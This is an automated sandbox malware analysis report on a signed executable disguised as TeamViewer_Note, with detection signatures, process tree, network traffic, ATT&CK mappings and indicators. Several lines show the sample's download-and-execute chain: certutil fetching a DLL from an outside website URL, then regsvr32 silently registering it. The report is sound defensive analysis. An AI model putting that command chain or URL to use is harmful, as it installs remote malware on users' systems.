
Windows Analysis Report cBQPecnQRp

Overview

General Information

Sample Name: cBQPecnQRp (renamed file extension from none to exe)
Analysis ID: 483791
MD5: 53817315b195e328ccc0f56b15b247c7
SHA1: 7bedab96b89d000288b573de0b5693cf49dae47f
SHA256: ea2decec34ae3129d5da1f2035b34cff3c9f656bb4423904ef6b0a3ca5f47d5e
Tags: exe, HartexLLC, signed

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:47
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Sigma detected: Regsvr32 Anomaly
Sigma detected: Suspicious Certutil Command
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Registers a DLL
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • cBQPecnQRp.exe (PID: 5760 cmdline: 'C:\Users\user\Desktop\cBQPecnQRp.exe' MD5: 53817315B195E328CCC0F56B15B247C7)
    • cmd.exe (PID: 6152 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • certutil.exe (PID: 4528 cmdline: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' MD5: D056DF596F6E02A36841E69872AEF7BD)
      • regsvr32.exe (PID: 5340 cmdline: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly
Source: Process started | Author: Florian Roth, oscd.community | Data: Command: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll', CommandLine: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6152, ProcessCommandLine: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll', ProcessId: 5340
Sigma detected: Suspicious Certutil Command
Source: Process started | Author: Florian Roth, juju4, keepwatch | Data: Command: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll', CommandLine: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll', CommandLine|base64offset|contains: q!, Image: C:\Windows\SysWOW64\certutil.exe, NewProcessName: C:\Windows\SysWOW64\certutil.exe, OriginalFileName: C:\Windows\SysWOW64\certutil.exe, ParentCommandLine: C:\Windows\System32\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6152, ProcessCommandLine: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll', ProcessId: 4528

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: cBQPecnQRp.exe | Virustotal: Detection: 10%
Multi AV Scanner detection for domain / URL
Source: https://www.christchurchmvl.org/volunteer/actXApiLib.dll | Virustotal: Detection: 11%

Compliance:

Uses 32bit PE files
Source: cBQPecnQRp.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2
PE / OLE file has a valid certificate
Source: cBQPecnQRp.exe | Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb) source: cBQPecnQRp.exe
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00466410 FindFirstFileExW,

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\certutil.exe | Network Connect: 100.26.95.170 187
Source: C:\Windows\SysWOW64\certutil.exe | Domain query: www.christchurchmvl.org
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 15 Sep 2021 11:47:29 GMT
  Server: Apache
  Content-Length: 196
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
Source: cBQPecnQRp.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: cBQPecnQRp.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: cBQPecnQRp.exe | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: cBQPecnQRp.exe | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: cBQPecnQRp.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: cBQPecnQRp.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: cBQPecnQRp.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: cBQPecnQRp.exe | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: cBQPecnQRp.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: cBQPecnQRp.exe | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: cBQPecnQRp.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: cBQPecnQRp.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: cBQPecnQRp.exe | String found in binary or memory: http://ocsp.comodoca.com0
Source: cBQPecnQRp.exe | String found in binary or memory: http://ocsp.digicert.com0C
Source: cBQPecnQRp.exe | String found in binary or memory: http://ocsp.digicert.com0O
Source: cBQPecnQRp.exe | String found in binary or memory: http://ocsp.sectigo.com0
Source: cBQPecnQRp.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: cBQPecnQRp.exe | String found in binary or memory: https://sectigo.com/CPS0
Source: certutil.exe, 0000000A.00000002.776165001.0000000000550000.00000004.00000020.sdmp | String found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dll
Source: certutil.exe, 0000000A.00000002.777469638.0000000000930000.00000004.00000040.sdmp | String found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dllC:
Source: cBQPecnQRp.exe | String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown | DNS traffic detected: queries for: www.christchurchmvl.org
Source: global traffic | HTTP traffic detected:
  GET /volunteer/actXApiLib.dll HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Accept: */*
  User-Agent: Microsoft-CryptoAPI/10.0
  Host: www.christchurchmvl.org
Source: global traffic | HTTP traffic detected:
  GET /volunteer/actXApiLib.dll HTTP/1.1
  Accept: */*
  User-Agent: CertUtil URL Agent
  Host: www.christchurchmvl.org
  Cache-Control: no-cache
Source: unknown | HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2

System Summary:

Source: cBQPecnQRp.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004340B0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00432A00
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0049C051
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0046207C
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004520EB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00402080
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004961AB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004321AB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00402210
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004443F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0048C4C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004744D0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0049E4E7
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004024F2
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004685D0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00484580
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004025A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0048E620
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00402700
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0045A7C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00484790
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00402850
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00424970
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004029E0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00402B70
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00464CC9
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00402CF0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00402E70
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0048CFC0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0049901A
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0045B2E0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004773C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00401390
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00433450
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004454F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0046B48F
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004514A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004014B0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0045154D
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00433569
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004755F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0046B5AF
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00401610
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00493680
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00401760
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0048D7F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004337A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00499809
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004518BF
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0048B9A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: String function: 00421740 appears 48 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: String function: 0044FEB0 appears 40 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: String function: 0044F762 appears 75 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: String function: 00420FA0 appears 63 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: String function: 0044F26F appears 71 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0044E3F5 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Process Stats: CPU usage > 98%
Source: cBQPecnQRp.exe | Binary or memory string: OriginalFilename vs cBQPecnQRp.exe
Source: cBQPecnQRp.exe, 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe
Source: cBQPecnQRp.exe | Binary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe
Source: cBQPecnQRp.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: actxapilib.dll
Source: cBQPecnQRp.exe | Virustotal: Detection: 10%
Source: cBQPecnQRp.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\cBQPecnQRp.exe 'C:\Users\user\Desktop\cBQPecnQRp.exe'
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: classification engine | Classification label: mal72.evad.winEXE@8/1@2/1
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_01
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00422D90 LoadResource,LockResource,SizeofResource,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Command line argument: ~GI
Source: C:\Windows\SysWOW64\certutil.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: cBQPecnQRp.exe | Static file information: File size 1363448 > 1048576
Source: cBQPecnQRp.exe | Static PE information: certificate valid
Source: cBQPecnQRp.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cBQPecnQRp.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cBQPecnQRp.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cBQPecnQRp.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cBQPecnQRp.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cBQPecnQRp.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cBQPecnQRp.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb) source: cBQPecnQRp.exe
Source: cBQPecnQRp.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cBQPecnQRp.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cBQPecnQRp.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cBQPecnQRp.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cBQPecnQRp.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00434A6C push eax; ret
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00410AAA push ss; iretd
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0044F73C push ecx; ret
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00493990 push ecx; mov dword ptr [esp], ecx
Source: cBQPecnQRp.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044E000 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\certutil.exe TID: 6060 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0044C1E6 VirtualQuery,GetSystemInfo,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00466410 FindFirstFileExW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0044EE91 IsDebuggerPresent,OutputDebugStringW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004944F0 TlsGetValue,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,TlsSetValue,GetProcessHeap,HeapFree,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0046619E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00434891 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0044ECD5 mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0045D9CF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0044FE43 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0045976E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0044F8B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\certutil.exe | Network Connect: 100.26.95.170 187
Source: C:\Windows\SysWOW64\certutil.exe | Domain query: www.christchurchmvl.org
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_0041E0FC cpuid
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_00440690 GetLocalTime,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004A85C0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,
Source: C:\Users\user\Desktop\cBQPecnQRp.exe | Code function: 1_2_004A7879 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Command and Scripting Interpreter 2 | DLL Side-Loading 1 | Process Injection 111 | Virtualization/Sandbox Evasion 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | Application Shimming 1 | DLL Side-Loading 1 | Process Injection 111 | LSASS Memory | Security Software Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 4 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Regsvr32 1 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | System Information Discovery 23 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

Behavior Graph

[Behavior graph, ID 483791, sample cBQPecnQRp, start date 15/09/2021, architecture WINDOWS, score 72. Process chain: cBQPecnQRp.exe starts cmd.exe, which starts certutil.exe, regsvr32.exe and conhost.exe. certutil.exe queries www.christchurchmvl.org and connects to christchurchmvl.org 100.26.95.170 (ports 443, 49772, 49773; AMAZON-AESUS, United States) and drops C:\ProgramData\actXApiLib.dll (file type: HTML). Signatures on the graph: Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for submitted file; Sigma detected: Regsvr32 Anomaly; Sigma detected: Suspicious Certutil Command; System process connects to network (likely due to code injection or exploit).]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
cBQPecnQRp.exe | 10% | Virustotal |
cBQPecnQRp.exe | 2% | ReversingLabs |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
christchurchmvl.org | 0% | Virustotal |
www.christchurchmvl.org | 2% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
https://www.christchurchmvl.org/volunteer/actXApiLib.dll | 11% | Virustotal |
https://www.christchurchmvl.org/volunteer/actXApiLib.dll | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
https://www.christchurchmvl.org/volunteer/actXApiLib.dllC: | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
christchurchmvl.org | 100.26.95.170 | true | true | | unknown
www.christchurchmvl.org | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://www.christchurchmvl.org/volunteer/actXApiLib.dll | true | 11%, Virustotal; Avira URL Cloud: safe | unknown

